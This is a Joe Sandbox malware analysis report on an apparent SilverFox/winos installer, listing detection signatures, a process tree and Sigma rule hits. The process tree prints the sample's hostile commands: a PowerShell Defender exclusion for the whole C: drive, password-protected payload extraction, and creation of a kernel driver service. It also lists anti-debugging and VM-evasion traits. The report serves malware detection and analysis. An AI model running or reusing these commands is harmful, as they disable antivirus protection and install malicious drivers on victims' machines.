Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U5b89#U88c5#U52a9#U624b1.0.3.exe

Overview

General Information

Sample name:#U5b89#U88c5#U52a9#U624b1.0.3.exe
renamed because original name is a hash value
Original sample name:1.0.3.exe
Analysis ID:1580230
MD5:3dd1a269e502f7284674c54819e9ad8e
SHA1:f3764c08583b70e6427d8efe97e6daa1582de9a3
SHA256:9622e99ad30c7b5bef5ad85c34ea80a961f1d5d05dcc9a0083c3fa8a00966228
Tags:exeSilverFoxwinosuser-kafan_shengui
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b1.0.3.exe (PID: 7000 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" MD5: 3DD1A269E502F7284674C54819E9AD8E)
    • #U5b89#U88c5#U52a9#U624b1.0.3.tmp (PID: 3048 cmdline: "C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$2040C,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" MD5: CC931C68EF6CB43932F2B21773072C73)
      • powershell.exe (PID: 3568 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 2760 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b1.0.3.exe (PID: 6532 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT MD5: 3DD1A269E502F7284674C54819E9AD8E)
        • #U5b89#U88c5#U52a9#U624b1.0.3.tmp (PID: 3328 cmdline: "C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$1042A,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT MD5: CC931C68EF6CB43932F2B21773072C73)
          • 7zr.exe (PID: 6032 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 5440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 5660 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6032 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • sc.exe (PID: 5440 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • conhost.exe (PID: 6908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6032 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • sc.exe (PID: 5896 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • conhost.exe (PID: 6012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5660 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • sc.exe (PID: 6120 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4196 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6052 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6428 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1364 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5636 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5764 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 764 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4196 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6124 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1664 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5740 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6404 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6028 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5636 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1668 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2820 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6124 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3700 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4044 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6024 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3280 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5756 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3360 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4560 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6976 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1756 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5884 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2788 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5764 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6468 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6124 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6052 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6820 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3872 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5632 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6456 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4024 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6888 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5764 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6116 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4048 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 672 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3000 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1372 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2268 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6568 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6484 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6048 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6908 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6900 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6028 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1668 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6124 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6468 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1664 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6836 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5908 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5708 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6568 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$2040C,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp, ParentProcessId: 3048, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 3568, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4196, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 6052, ProcessName: sc.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$2040C,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp, ParentProcessId: 3048, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 3568, ProcessName: powershell.exe
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4196, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 6052, ProcessName: sc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$2040C,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp, ParentProcessId: 3048, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 3568, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Program Files (x86)\Windows NT\hrsw.vbcVirustotal: Detection: 15%Perma Link
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeVirustotal: Detection: 6%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 84.0% probability
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.2169234402.0000000002150000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2169131101.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CC4AEC0 FindFirstFileA,FindClose,6_2_6CC4AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007C6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_007C6868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007C7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_007C7496
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000006.00000002.2298504162.0000000004429000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000006.00000002.2298504162.0000000004429000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000006.00000002.2298504162.0000000004429000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000006.00000002.2298504162.0000000004429000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000006.00000002.2298504162.0000000004429000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000006.00000002.2298504162.0000000004429000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000006.00000002.2298504162.0000000004429000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000006.00000002.2298504162.0000000004429000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000006.00000002.2298504162.0000000004429000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000006.00000002.2298504162.0000000004429000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
